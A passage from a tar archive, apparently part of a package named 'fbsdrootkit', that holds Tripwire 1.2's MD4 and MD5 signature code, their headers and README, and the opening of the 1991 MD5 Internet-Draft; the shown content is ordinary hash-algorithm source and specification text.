MDptr MDp; { int i,j; char s[200], *pc; for (i=0;i<4;i++) { pc = s; for (j=0;j<32;j=j+8) { sprintf(pc, "%02x",(MDp->buffer[i]>>j) & 0xFF); pc += 2; } sscanf(s, "%lx", &lbuf[i]); } for (i = 0, pc = dest; i < 4; i++, pc += 8) { sprintf(pc, "%08lx", lbuf[i]); } } extern char *pltob64(); void MDsprint64(dest, MDp) char *dest; MDptr MDp; { pltob64(MDp->buffer, dest, 4); } /* MDbegin(MDp) ** Initialize message digest buffer MDp. ** This is a user-callable routine. */ void MDbegin(MDp) MDptr MDp; { int i; MDp->buffer[0] = I0; MDp->buffer[1] = I1; MDp->buffer[2] = I2; MDp->buffer[3] = I3; for (i=0;i<8;i++) MDp->count[i] = 0; MDp->done = 0; } /* MDreverse(X) ** Reverse the byte-ordering of every int in X. ** Assumes X is an array of 16 ints. ** The macro revx reverses the byte-ordering of the next word of X. */ #define revx { t = (*X << 16) | (*X >> 16); \ *X++ = ((t & 0xFF00FF00) >> 8) | ((t & 0x00FF00FF) << 8); } void MDreverse(X) unsigned int *X; { register unsigned int t; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; revx; } /* MDblock(MDp,X) ** Update message digest buffer MDp->buffer using 16-word data block X. ** Assumes all 16 words of X are full of data. ** Does not update MDp->count. ** This routine is not user-callable. */ static void MDblock(MDp,X) MDptr MDp; unsigned int *X; { register unsigned int tmp, A, B, C, D; #if BYTEORDER == 0x4321 MDreverse(X); #endif A = MDp->buffer[0]; B = MDp->buffer[1]; C = MDp->buffer[2]; D = MDp->buffer[3]; /* Update the message digest buffer */ ff(A , B , C , D , 0 , fs1); /* Round 1 */ ff(D , A , B , C , 1 , fs2); ff(C , D , A , B , 2 , fs3); ff(B , C , D , A , 3 , fs4); ff(A , B , C , D , 4 , fs1); ff(D , A , B , C , 5 , fs2); ff(C , D , A , B , 6 , fs3); ff(B , C , D , A , 7 , fs4); ff(A , B , C , D , 8 , fs1); ff(D , A , B , C , 9 , fs2); ff(C , D , A , B , 10 , fs3); ff(B , C , D , A , 11 , fs4); ff(A , B , C , D , 12 , fs1); ff(D , A , B , C , 13 , fs2); ff(C , D , A , B , 14 , fs3); ff(B , C , D , A , 15 , fs4); gg(A , B , C , D , 0 , gs1); /* Round 2 */ gg(D , A , B , C , 4 , gs2); gg(C , D , A , B , 8 , gs3); gg(B , C , D , A , 12 , gs4); gg(A , B , C , D , 1 , gs1); gg(D , A , B , C , 5 , gs2); gg(C , D , A , B , 9 , gs3); gg(B , C , D , A , 13 , gs4); gg(A , B , C , D , 2 , gs1); gg(D , A , B , C , 6 , gs2); gg(C , D , A , B , 10 , gs3); gg(B , C , D , A , 14 , gs4); gg(A , B , C , D , 3 , gs1); gg(D , A , B , C , 7 , gs2); gg(C , D , A , B , 11 , gs3); gg(B , C , D , A , 15 , gs4); hh(A , B , C , D , 0 , hs1); /* Round 3 */ hh(D , A , B , C , 8 , hs2); hh(C , D , A , B , 4 , hs3); hh(B , C , D , A , 12 , hs4); hh(A , B , C , D , 2 , hs1); hh(D , A , B , C , 10 , hs2); hh(C , D , A , B , 6 , hs3); hh(B , C , D , A , 14 , hs4); hh(A , B , C , D , 1 , hs1); hh(D , A , B , C , 9 , hs2); hh(C , D , A , B , 5 , hs3); hh(B , C , D , A , 13 , hs4); hh(A , B , C , D , 3 , hs1); hh(D , A , B , C , 11 , hs2); hh(C , D , A , B , 7 , hs3); hh(B , C , D , A , 15 , hs4); MDp->buffer[0] += A; MDp->buffer[1] += B; MDp->buffer[2] += C; MDp->buffer[3] += D; } /* MDupdate(MDp,X,count) ** Input: MDp -- an MDptr ** X -- a pointer to an array of unsigned characters. ** count -- the number of bits of X to use. ** (if not a multiple of 8, uses high bits of last byte.) ** Update MDp using the number of bits of X given by count. ** This is the basic input routine for an MD4 user. ** The routine completes the MD computation when count < 512, so ** every MD computation should end with one call to MDupdate with a ** count less than 512. A call with count 0 will be ignored if the ** MD has already been terminated (done != 0), so an extra call with count ** 0 can be given as a ``courtesy close'' to force termination if desired. */ void MDupdate(MDp,X,count) MDptr MDp; unsigned char *X; unsigned int count; { unsigned int i, tmp, bit, byte, mask; unsigned char XX[64]; unsigned char *p; /* return with no error if this is a courtesy close with count ** zero and MDp->done is true. */ if (count == 0 && MDp->done) return; /* check to see if MD is already done and report error */ if (MDp->done) { printf("\nError: MDupdate MD already done."); return; } /* Add count to MDp->count */ tmp = count; p = MDp->count; while (tmp) { tmp += *p; *p++ = tmp; tmp = tmp >> 8; } /* Process data */ if (count == 512) { /* Full block of data to handle */ MDblock(MDp,(unsigned int *)X); } else if (count > 512) /* Check for count too large */ { printf("\nError: MDupdate called with illegal count value %d.",count); return; } else /* partial block -- must be last block so finish up */ { /* Find out how many bytes and residual bits there are */ byte = count >> 3; bit = count & 7; /* Copy X into XX since we need to modify it */ for (i=0;i<=byte;i++) XX[i] = X[i]; for (i=byte+1;i<64;i++) XX[i] = 0; /* Add padding '1' bit and low-order zeros in last byte */ mask = 1 << (7 - bit); XX[byte] = (XX[byte] | mask) & ~( mask - 1); /* If room for bit count, finish up with this block */ if (byte <= 55) { for (i=0;i<8;i++) XX[56+i] = MDp->count[i]; MDblock(MDp,(unsigned int *)XX); } else /* need to do two blocks to finish up */ { MDblock(MDp,(unsigned int *)XX); for (i=0;i<56;i++) XX[i] = 0; for (i=0;i<8;i++) XX[56+i] = MDp->count[i]; MDblock(MDp,(unsigned int *)XX); } /* Set flag saying we're done with MD computation */ MDp->done = 1; } } fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4.h100600 764 764 3600 5434607537 15600 0ustar dfdf/* $Id: md4.h,v 1.2 1993/08/19 05:27:59 genek Exp $ */ /* ** ************************************************************************** ** md4.h -- Header file for implementation of MD4 Message Digest Algorithm ** ** Updated: 2/13/90 by Ronald L. Rivest ** ** (C) 1990 RSA Data Security, Inc. ** ** ************************************************************************** */ /* MDstruct is the data structure for a message digest computation. */ typedef struct { unsigned int buffer[4]; /* Holds 4-word result of MD computation */ unsigned char count[8]; /* Number of bits processed so far */ unsigned int done; /* Nonzero means MD computation finished */ } MDstruct, *MDptr; /* MDbegin(MD) ** Input: MD -- an MDptr ** Initialize the MDstruct prepatory to doing a message digest computation. */ extern void MDbegin(); /* MDupdate(MD,X,count) ** Input: MD -- an MDptr ** X -- a pointer to an array of unsigned characters. ** count -- the number of bits of X to use (an unsigned int). ** Updates MD using the first ``count'' bits of X. ** The array pointed to by X is not modified. ** If count is not a multiple of 8, MDupdate uses high bits of last byte. ** This is the basic input routine for a user. ** The routine terminates the MD computation when count < 512, so ** every MD computation should end with one call to MDupdate with a ** count less than 512. Zero is OK for a count. */ extern void MDupdate(); /* MDprint(MD) ** Input: MD -- an MDptr ** Prints message digest buffer MD as 32 hexadecimal digits. ** Order is from low-order byte of buffer[0] to high-order byte of buffer[3]. ** Each byte is printed with high-order hexadecimal digit first. */ extern void MDprint(); /* ** End of md4.h ****************************(cut)*****************************************/ int sig_md4_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4wrapper.c100600 764 764 3562 5614757141 17200 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md4wrapper.c,v 1.8 1994/07/25 15:46:41 gkim Exp $"; #endif /* * md4wrapper.c * * signature function hook for MD4 (the RSA Data Security, Inc. MD4 * Message Digesting Algorithm) for Tripwire. * * The original MD4 code is contained in md4.c in its entirety. * * Gene Kim * Purdue University * October 14, 1992 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "md4.h" #define BUFSIZE 64 /* limit of in-struct buffer size */ static MDstruct mdbucket; /* MD4 data structure */ extern void MDsprint(), MDsprint64(); /* * int * pf_signature(int fd_in, char *ps_signature, int siglen) * * fd_in: pointer to input file descriptor * ps_signature: pointer to array where signature will be stored * siglen: length of the signature array (for overflow checking) */ int sig_md4_get (fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { unsigned char buffer[BUFSIZE]; int readin = -1; MDstruct *mdbuf; FILE *fp; mdbuf = &mdbucket; ps_signature[0] = '\0'; /* get stdio handle * we use dup() so we can close() it later */ if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) { perror("sig_haval_get: fdopen()"); exit(1); } /* rewind the file descriptor */ rewind(fp); MDbegin (mdbuf); while ((readin = fread(buffer, 1, BUFSIZE, fp)) > 0) { MDupdate(mdbuf, buffer, readin*8); } if (readin < 0) { perror("sig_md4_get: read()"); exit(1); } MDupdate(mdbuf, buffer, (unsigned)readin); if (printhex) { MDsprint(ps_signature, mdbuf); } else { MDsprint64(ps_signature, mdbuf); } fclose(fp); return 0; } fbsdrootkit-1.2/tripwire-1.2/sigs/md5/ 40700 764 764 0 5630552016 14633 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md5/Makefile100600 764 764 465 5474057132 16364 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:18 genek Exp $ # # Makefile for md5 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md5.o md5wrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf md5.o md5wrapper.o .pure md5.o: ../../include/byteorder.h md5wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md5/README.md5100600 764 764 5017 5434607543 16311 0ustar dfdf# $Id: README.md5,v 1.2 1993/08/19 05:28:03 genek Exp $ /*********************************************************************** ** md5.c -- the source code for MD5 routines ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 1/91 SRD,AJ,BSK,JT Reference C Version ** ** Revised (for MD5): RLR 4/27/91 ** *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** These notices must be retained in any copies of any part of this ** ***********************************************************************/ The MD5 message-digesting package is copyrighted by RSA Data Security, Inc. The disclaimer from the C code has been retained, and is shown above. All big-endian/little-endian specific code in md5.c has been replaced by code that can resolve this automatically at compile-time. Tripwire specific code is in md5wrapper.c, which contains the routine 'sig_md5_get' to minimize the amount of overhead in collecting signatures from within Tripwire. (We certainly don't want to fork() for every file we need to scan!) Because of this, these files is no longer identical to the MD5 virgin distribution. I have sent my changes to the MD5 author, but I am not aware of any buybacks at this time. The original MD5 code can be found in the Internet Working Draft RFC 1321. This can be obtained via anonymous FTP (user = anonymous, password = guest) from NIC.DDN.MIL. Gene Kim September 7, 1992 fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.c100600 764 764 24061 5474057132 15613 0ustar dfdf/* $Id: md5.c,v 1.3 1993/11/22 06:38:18 genek Exp $ */ /*********************************************************************** ** md5.c -- the source code for MD5 routines ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 1/91 SRD,AJ,BSK,JT Reference C Version ** ** Revised (for MD5): RLR 4/27/91 ** *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** These notices must be retained in any copies of any part of this ** ** documentation and/or software. ** **********************************************************************/ #include "md5.h" /* forward declaration */ static void Transform (); static unsigned char PADDING[64] = { 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; /* F, G, H and I are basic MD5 functions */ #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) #define H(x, y, z) ((x) ^ (y) ^ (z)) #define I(x, y, z) ((y) ^ ((x) | (~z))) /* ROTATE_LEFT rotates x left n bits */ #ifdef UNICOS # define ROTATE_LEFT(x,n) (((x) << (n)) | (((x) & 0xffffffff) >> (32-(n)))) #else # define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) #endif /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */ /* Rotation is separate from addition to prevent recomputation */ #define FF(a, b, c, d, x, s, ac) \ {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define GG(a, b, c, d, x, s, ac) \ {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define HH(a, b, c, d, x, s, ac) \ {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define II(a, b, c, d, x, s, ac) \ {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } /* The routine MD5Init initializes the message-digest context mdContext. All fields are set to zero. */ void MD5Init (mdContext) MD5_CTX *mdContext; { mdContext->i[0] = mdContext->i[1] = (UINT4)0; /* Load magic initialization constants. */ mdContext->buf[0] = (UINT4)0x67452301; mdContext->buf[1] = (UINT4)0xefcdab89; mdContext->buf[2] = (UINT4)0x98badcfe; mdContext->buf[3] = (UINT4)0x10325476; } /* The routine MD5Update updates the message-digest context to account for the presence of each of the characters inBuf[0..inLen-1] in the message whose digest is being computed. */ void MD5Update (mdContext, inBuf, inLen) MD5_CTX *mdContext; unsigned char *inBuf; unsigned int inLen; { UINT4 in[16]; int mdi; unsigned int i, ii; /* compute number of bytes mod 64 */ mdi = (int)((mdContext->i[0] >> 3) & 0x3F); /* update number of bits */ #ifndef UNICOS if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0]) #else if (((mdContext->i[0]+((UINT4)inLen << 3)) & 0xffffffff) < mdContext->i[0]) #endif mdContext->i[1]++; mdContext->i[0] += ((UINT4)inLen << 3); mdContext->i[1] += ((UINT4)inLen >> 29); while (inLen--) { /* add new character to buffer, increment mdi */ mdContext->in[mdi++] = *inBuf++; /* transform if necessary */ if (mdi == 0x40) { for (i = 0, ii = 0; i < 16; i++, ii += 4) in[i] = (((UINT4)mdContext->in[ii+3]) << 24) | (((UINT4)mdContext->in[ii+2]) << 16) | (((UINT4)mdContext->in[ii+1]) << 8) | ((UINT4)mdContext->in[ii]); Transform (mdContext->buf, in); mdi = 0; } } } /* The routine MD5Final terminates the message-digest computation and ends with the desired message digest in mdContext->digest[0...15]. */ void MD5Final (mdContext) MD5_CTX *mdContext; { UINT4 in[16]; int mdi; unsigned int i, ii; unsigned int padLen; /* save number of bits */ in[14] = mdContext->i[0]; in[15] = mdContext->i[1]; /* compute number of bytes mod 64 */ mdi = (int)((mdContext->i[0] >> 3) & 0x3F); /* pad out to 56 mod 64 */ padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi); MD5Update (mdContext, PADDING, padLen); /* append length in bits and transform */ for (i = 0, ii = 0; i < 14; i++, ii += 4) in[i] = (((UINT4)mdContext->in[ii+3]) << 24) | (((UINT4)mdContext->in[ii+2]) << 16) | (((UINT4)mdContext->in[ii+1]) << 8) | ((UINT4)mdContext->in[ii]); Transform (mdContext->buf, in); /* store buffer in digest */ for (i = 0, ii = 0; i < 4; i++, ii += 4) { mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF); mdContext->digest[ii+1] = (unsigned char)((mdContext->buf[i] >> 8) & 0xFF); mdContext->digest[ii+2] = (unsigned char)((mdContext->buf[i] >> 16) & 0xFF); mdContext->digest[ii+3] = (unsigned char)((mdContext->buf[i] >> 24) & 0xFF); } } /* Basic MD5 step. Transforms buf based on in. */ static void Transform (buf, in) UINT4 *buf; UINT4 *in; { UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3]; /* Round 1 */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 FF ( a, b, c, d, in[ 0], S11, 0xd76aa478); /* 1 */ FF ( d, a, b, c, in[ 1], S12, 0xe8c7b756); /* 2 */ FF ( c, d, a, b, in[ 2], S13, 0x242070db); /* 3 */ FF ( b, c, d, a, in[ 3], S14, 0xc1bdceee); /* 4 */ FF ( a, b, c, d, in[ 4], S11, 0xf57c0faf); /* 5 */ FF ( d, a, b, c, in[ 5], S12, 0x4787c62a); /* 6 */ FF ( c, d, a, b, in[ 6], S13, 0xa8304613); /* 7 */ FF ( b, c, d, a, in[ 7], S14, 0xfd469501); /* 8 */ FF ( a, b, c, d, in[ 8], S11, 0x698098d8); /* 9 */ FF ( d, a, b, c, in[ 9], S12, 0x8b44f7af); /* 10 */ FF ( c, d, a, b, in[10], S13, 0xffff5bb1); /* 11 */ FF ( b, c, d, a, in[11], S14, 0x895cd7be); /* 12 */ FF ( a, b, c, d, in[12], S11, 0x6b901122); /* 13 */ FF ( d, a, b, c, in[13], S12, 0xfd987193); /* 14 */ FF ( c, d, a, b, in[14], S13, 0xa679438e); /* 15 */ FF ( b, c, d, a, in[15], S14, 0x49b40821); /* 16 */ /* Round 2 */ #define S21 5 #define S22 9 #define S23 14 #define S24 20 GG ( a, b, c, d, in[ 1], S21, 0xf61e2562); /* 17 */ GG ( d, a, b, c, in[ 6], S22, 0xc040b340); /* 18 */ GG ( c, d, a, b, in[11], S23, 0x265e5a51); /* 19 */ GG ( b, c, d, a, in[ 0], S24, 0xe9b6c7aa); /* 20 */ GG ( a, b, c, d, in[ 5], S21, 0xd62f105d); /* 21 */ GG ( d, a, b, c, in[10], S22, 0x2441453); /* 22 */ GG ( c, d, a, b, in[15], S23, 0xd8a1e681); /* 23 */ GG ( b, c, d, a, in[ 4], S24, 0xe7d3fbc8); /* 24 */ GG ( a, b, c, d, in[ 9], S21, 0x21e1cde6); /* 25 */ GG ( d, a, b, c, in[14], S22, 0xc33707d6); /* 26 */ GG ( c, d, a, b, in[ 3], S23, 0xf4d50d87); /* 27 */ GG ( b, c, d, a, in[ 8], S24, 0x455a14ed); /* 28 */ GG ( a, b, c, d, in[13], S21, 0xa9e3e905); /* 29 */ GG ( d, a, b, c, in[ 2], S22, 0xfcefa3f8); /* 30 */ GG ( c, d, a, b, in[ 7], S23, 0x676f02d9); /* 31 */ GG ( b, c, d, a, in[12], S24, 0x8d2a4c8a); /* 32 */ /* Round 3 */ #define S31 4 #define S32 11 #define S33 16 #define S34 23 HH ( a, b, c, d, in[ 5], S31, 0xfffa3942); /* 33 */ HH ( d, a, b, c, in[ 8], S32, 0x8771f681); /* 34 */ HH ( c, d, a, b, in[11], S33, 0x6d9d6122); /* 35 */ HH ( b, c, d, a, in[14], S34, 0xfde5380c); /* 36 */ HH ( a, b, c, d, in[ 1], S31, 0xa4beea44); /* 37 */ HH ( d, a, b, c, in[ 4], S32, 0x4bdecfa9); /* 38 */ HH ( c, d, a, b, in[ 7], S33, 0xf6bb4b60); /* 39 */ HH ( b, c, d, a, in[10], S34, 0xbebfbc70); /* 40 */ HH ( a, b, c, d, in[13], S31, 0x289b7ec6); /* 41 */ HH ( d, a, b, c, in[ 0], S32, 0xeaa127fa); /* 42 */ HH ( c, d, a, b, in[ 3], S33, 0xd4ef3085); /* 43 */ HH ( b, c, d, a, in[ 6], S34, 0x4881d05); /* 44 */ HH ( a, b, c, d, in[ 9], S31, 0xd9d4d039); /* 45 */ HH ( d, a, b, c, in[12], S32, 0xe6db99e5); /* 46 */ HH ( c, d, a, b, in[15], S33, 0x1fa27cf8); /* 47 */ HH ( b, c, d, a, in[ 2], S34, 0xc4ac5665); /* 48 */ /* Round 4 */ #define S41 6 #define S42 10 #define S43 15 #define S44 21 II ( a, b, c, d, in[ 0], S41, 0xf4292244); /* 49 */ II ( d, a, b, c, in[ 7], S42, 0x432aff97); /* 50 */ II ( c, d, a, b, in[14], S43, 0xab9423a7); /* 51 */ II ( b, c, d, a, in[ 5], S44, 0xfc93a039); /* 52 */ II ( a, b, c, d, in[12], S41, 0x655b59c3); /* 53 */ II ( d, a, b, c, in[ 3], S42, 0x8f0ccc92); /* 54 */ II ( c, d, a, b, in[10], S43, 0xffeff47d); /* 55 */ II ( b, c, d, a, in[ 1], S44, 0x85845dd1); /* 56 */ II ( a, b, c, d, in[ 8], S41, 0x6fa87e4f); /* 57 */ II ( d, a, b, c, in[15], S42, 0xfe2ce6e0); /* 58 */ II ( c, d, a, b, in[ 6], S43, 0xa3014314); /* 59 */ II ( b, c, d, a, in[13], S44, 0x4e0811a1); /* 60 */ II ( a, b, c, d, in[ 4], S41, 0xf7537e82); /* 61 */ II ( d, a, b, c, in[11], S42, 0xbd3af235); /* 62 */ II ( c, d, a, b, in[ 2], S43, 0x2ad7d2bb); /* 63 */ II ( b, c, d, a, in[ 9], S44, 0xeb86d391); /* 64 */ buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } fbsdrootkit-1.2/tripwire-1.2/sigs/md5/md5.doc100600 764 764 45257 5434607545 16155 0ustar dfdf## $Id: md5.doc,v 1.3 1993/08/19 05:28:05 genek Exp $ Network Working Group R. Rivest INTERNET-DRAFT MIT Laboratory for Computer Science S. Dusse RSA Data Security, Inc. 10 July 1991 The MD5 Message-Digest Algorithm STATUS OF THIS MEMO This draft document will be submitted to the RFC editor as a protocol specification. Comments should be sent to or to the authors. Distribution of this memo is unlimited. ACKNOWLEDGEMENT We would like to thank Don Coppersmith, Burt Kaliski, Ralph Merkle, David Chaum, and Noam Nisan for numerous helpful comments and suggestions. Table of Contents 1. Executive Summary 1 2. Terminology and Notation 2 3. MD5 Algorithm Description 3 4. Summary 7 5. Summary of Differences Between MD4 and MD5 7 6. Security Considerations 7 References 8 Authors' Addresses 8 APPENDIX - Reference Implementation 9 1. Executive Summary This document describes the MD5 message-digest algorithm. The algorithm takes as input an input message of arbitrary length and produces as output a 128-bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA. Rivest and Dusse [Page 1] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 The MD5 algorithm is designed to be quite fast on 32-bit machines. In addition, the MD5 algorithm does not require any large substitution tables; the algorithm can be coded quite compactly. The MD5 algorithm is an extension of the MD4 message digest algorithm [1,2]. MD5 is slightly slower than MD4, but is more "conservative" in design. MD5 was designed because it was felt that MD4 was perhaps being adopted for use more quickly than justified by the existing critical review; because MD4 was designed to be exceptionally fast, it is "at the edge" in terms of risking successful cryptanalytic attack. MD5 backs off a bit, giving up a little in speed for a much greater likelihood of ultimate security. It incorporates some suggestions made by various reviewers, and contains additional optimizations. The MD5 algorithm is being placed in the public domain for review and possible adoption as a standard. A version of this document including the C source code in the appendix is available by FTP from RSA.COM in the file "pub/md5.doc". This document may be referred to, unofficially, as Internet draft [MD5-A]. For OSI-based applications, MD5's object identifier is md5 OBJECT IDENTIFIER ::= {iso(1) member-body(2) US(840) rsadsi(113549) digestAlgorithm(2) 5} In the X.509 type AlgorithmIdentifier [3], the parameters for MD5 should have type NULL. 2. Terminology and Notation In this document a "word" is a 32-bit quantity and a "byte" is an eight-bit quantity. A sequence of bits can be interpreted in a natural manner as a sequence of bytes, where each consecutive group of eight bits is interpreted as a byte with the high-order (most significant) bit of each byte listed first. Similarly, a sequence of bytes can be interpreted as a sequence of 32-bit words, where each consecutive group of four bytes is interpreted as a word with the low-order (least significant) byte given first. Let x_i denote "x sub i". If the subscript is an expression, we surround it in braces, as in x_{i+1}. Similarly, we use ^ for superscripts (exponentiation), so that x^i denotes x to the i-th power. Let the symbol "+" denote addition of words (i.e., modulo-2^32 addition). Let X <<< s denote the 32-bit value obtained by circularly shifting (rotating) X left by s bit positions. Let not(X) denote the Rivest and Dusse [Page 2] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 bit-wise complement of X, and let X v Y denote the bit-wise OR of X and Y. Let X xor Y denote the bit-wise XOR of X and Y, and let XY denote the bit-wise AND of X and Y. 3. MD5 Algorithm Description We begin by supposing that we have a b-bit message as input, and that we wish to find its message digest. Here b is an arbitrary nonnegative integer; b may be zero, it need not be a multiple of eight, and it may be arbitrarily large. We imagine the bits of the message written down as follows: m_0 m_1 ... m_{b-1} The following five steps are performed to compute the message digest of the message. 3.1 Step 1. Append Padding Bits The message is "padded" (extended) so that its length (in bits) is congruent to 448, modulo 512. That is, the message is extended so that it is just 64 bits shy of being a multiple of 512 bits long. Padding is always performed, even if the length of the message is already congruent to 448, modulo 512 (in which case 512 bits of padding are added). Padding is performed as follows: a single "1" bit is appended to the message, and then enough zero bits are appended so that the length in bits of the padded message becomes congruent to 448, modulo 512. 3.2 Step 2. Append Length A 64-bit representation of b (the length of the message before the padding bits were added) is appended to the result of the previous step. In the unlikely event that b is greater than 2^64, then only the low-order 64 bits of b are used. (These bits are appended as two 32-bit words and appended low-order word first in accordance with the previous conventions.) At this point the resulting message (after padding with bits and with b) has a length that is an exact multiple of 512 bits. Equivalently, this message has a length that is an exact multiple of 16 (32-bit) words. Let M[0 ... N-1] denote the words of the resulting message, where N is a multiple of 16. Rivest and Dusse [Page 3] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 3.3 Step 3. Initialize MD Buffer A four-word buffer (A,B,C,D) is used to compute the message digest. Here each of A, B, C, D is a 32-bit register. These registers are initialized to the following values in hexadecimal, low-order bytes first): word A: 01 23 45 67 word B: 89 ab cd ef word C: fe dc ba 98 word D: 76 54 32 10 3.4 Step 4. Process Message in 16-Word Blocks We first define four auxiliary functions that each take as input three 32-bit words and produce as output one 32-bit word. F(X,Y,Z) = XY v not(X) Z G(X,Y,Z) = XZ v Y not(Z) H(X,Y,Z) = X xor Y xor Z I(X,Y,Z) = Y xor (X v not(Z)) In each bit position F acts as a conditional: if X then Y else Z. (The function F could have been defined using + instead of v since XY and not(X)Z will never have 1's in the same bit position.) It is interesting to note that if the bits of X, Y, and Z are independent and unbiased, the each bit of F(X,Y,Z) will be independent and unbiased. The functions G, H, and I are similar to the function F, in that they act in "bitwise parallel" to produce their output from the bits of X, Y, and Z, in such a manner that if the corresponding bits of X, Y, and Z are independent and unbiased, then each bit of G(X,Y,Z), H(X,Y,Z), and I(X,Y,Z) will be independent and unbiased. Note that the function H is the bit-wise "xor" or "parity" function of its inputs. Do the following: /* Process each 16-word block. */ For i = 0 to N/16-1 do /* Copy block i into X. */ For j = 0 to 15 do Set X[j] to M[i*16+j]. end /* of loop on j */ /* Save A as AA, B as BB, C as CC, and D as DD. */ AA = A BB = B CC = C Rivest and Dusse [Page 4] INTERNET-DRAFT The MD5 Message-Digest Algorithm 10 July 1991 DD = D /* Round 1. */ /* Let FF(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + F(b,c,d) + X[k] + t) <<< s). */ /* Here the additive constants t are chosen as follows: In step i, the additive constant is the integer part of 4294967296 times abs(sin(i)), where i is in radians. */ /* Let S11 = 7, S12 = 12, S13 = 17, and S14 = 22. */ /* Do the following 16 operations. */ FF (a, b, c, d, X[ 0], S11, 3614090360); /* Step 1 */ FF (d, a, b, c, X[ 1], S12, 3905402710); /* 2 */ FF (c, d, a, b, X[ 2], S13, 606105819); /* 3 */ FF (b, c, d, a, X[ 3], S14, 3250441966); /* 4 */ FF (a, b, c, d, X[ 4], S11, 4118548399); /* 5 */ FF (d, a, b, c, X[ 5], S12, 1200080426); /* 6 */ FF (c, d, a, b, X[ 6], S13, 2821735955); /* 7 */ FF (b, c, d, a, X[ 7], S14, 4249261313); /* 8 */ FF (a, b, c, d, X[ 8], S11, 1770035416); /* 9 */ FF (d, a, b, c, X[ 9], S12, 2336552879); /* 10 */ FF (c, d, a, b, X[10], S13, 4294925233); /* 11 */ FF (b, c, d, a, X[11], S14, 2304563134); /* 12 */ FF (a, b, c, d, X[12], S11, 1804603682); /* 13 */ FF (d, a, b, c, X[13], S12, 4254626195); /* 14 */ FF (c, d, a, b, X[14], S13, 2792965006); /* 15 */ FF (b, c, d, a, X[15], S14, 1236535329); /* 16 */ /* Round 2. */ /* Let GG(a,b,c,d,X[k],s,t) denote the operation a = b + ((a + G(b,c,d) + X[k] + t) <<< s). */ /* Let S21 = 5, S22 = 9, S23 = 14, and S24 = 20. */ /* Do the following 16 operations. */ GG (a, b, c, d, X[ 1], S21, 4129170786); /* 17 */ GG (d, a, b, c, X[ 6], S22, 3225465664); /* 18 */ GG (c, d, 